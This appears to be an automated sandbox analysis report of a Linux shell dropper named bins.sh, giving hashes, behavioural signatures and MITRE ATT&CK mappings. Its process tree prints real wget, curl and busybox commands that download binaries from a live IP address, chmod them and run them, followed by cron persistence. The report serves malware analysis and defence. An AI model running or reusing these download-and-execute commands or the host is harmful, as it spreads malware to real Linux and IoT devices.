Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
25-11-2024 23:56
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
81a496ac5416f01f492d7eb50039a21c
-
SHA1
ecfdd7164357b662411ff449bec53c5a7aebc3cf
-
SHA256
ebecfae9d26f90c6a359f204c8aafff6948e28df6e9fc31707db37589222e423
-
SHA512
45b404d7ae5e72ba3958dd00940279dfbf8241c3cf0b9f85a3c8735ebec4fb038a3159df3a80636388025d7149d216ca1a9587dd99c5ecde8754380b8a3ee4be
-
SSDEEP
96:UmC6SBd7G2JT0a6MHjOszPlaqL7Z7p7Fa2F8mEwFC6SBd7wJfbozzPlaqLWy7Z7Z:Un02VUmF1Fa2ypF1Fa2l
Malware Config
Signatures
-
Contacts a large (2130) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid process 677 chmod -
Executes dropped EXE 1 IoCs
Processes:
LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2ioc pid process /tmp/LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 678 LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 -
Renames itself 1 IoCs
Processes:
LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2pid process 679 LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.RO09ks crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curldescription ioc process File opened for reading /proc/cpuinfo curl -
Processes:
LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2description ioc process File opened for reading /proc/713/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/785/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/818/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/304/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/717/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/769/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/914/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/954/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/959/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/1008/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/709/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/598/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/764/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/815/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/817/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/926/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/42/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/641/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/821/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/894/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/939/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/998/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/1019/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/12/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/715/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/731/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/868/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/885/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/964/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/7/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/721/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/772/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/775/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/905/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/930/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/931/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/989/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/19/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/722/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/766/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/898/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/943/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/1023/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/720/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/711/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/864/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/951/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/960/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/20/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/726/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/738/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/743/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/762/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/803/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/942/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/963/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/14/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/971/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/705/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/733/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/841/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/854/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/900/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 File opened for reading /proc/909/cmdline LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
Processes:
busyboxwgetcurldescription ioc process File opened for modification /tmp/LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 busybox File opened for modification /tmp/LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 wget File opened for modification /tmp/LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2 curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:643
-
/bin/rm/bin/rm bins.sh2⤵PID:645
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez22⤵
- Writes file to tmp directory
PID:647
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez22⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:671
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez22⤵
- Writes file to tmp directory
PID:676
-
-
/bin/chmodchmod 777 LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez22⤵
- File and Directory Permissions Modification
PID:677
-
-
/tmp/LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez2./LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez22⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:678 -
/bin/shsh -c "crontab -l"3⤵PID:680
-
/usr/bin/crontabcrontab -l4⤵PID:681
-
-
-
/bin/shsh -c "crontab -"3⤵PID:682
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:683
-
-
-
-
/bin/rmrm LmR9v8U4aHC158uhQjnjpUcljRCOHa6Ez22⤵PID:688
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gVwcxlVQP087VqZxBGUVW7P11yk8Mw4mqq2⤵PID:692
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
141KB
MD53ca8decdb1e52c423c521bfff02ac200
SHA18621ecd6807109b8541912ad9e134f6fb49bfd48
SHA256dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f
SHA512b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a
-
Filesize
210B
MD5eee892c426b7eaf6f3952a0057906804
SHA16c0e7f164a9e5d70eab512a1b3be123a54097012
SHA2561633a8be7b2f7e8f58ab0e00341fca664af9ab755fcba64ddb9d37d445e45b63
SHA51249f45715882bd81196384564705cfa78c84970b3b9b0a27030c89d3c2f037df2021a317ffdf29385669216ce50edd414a9a6fef09e72011dc583717bc8d6f020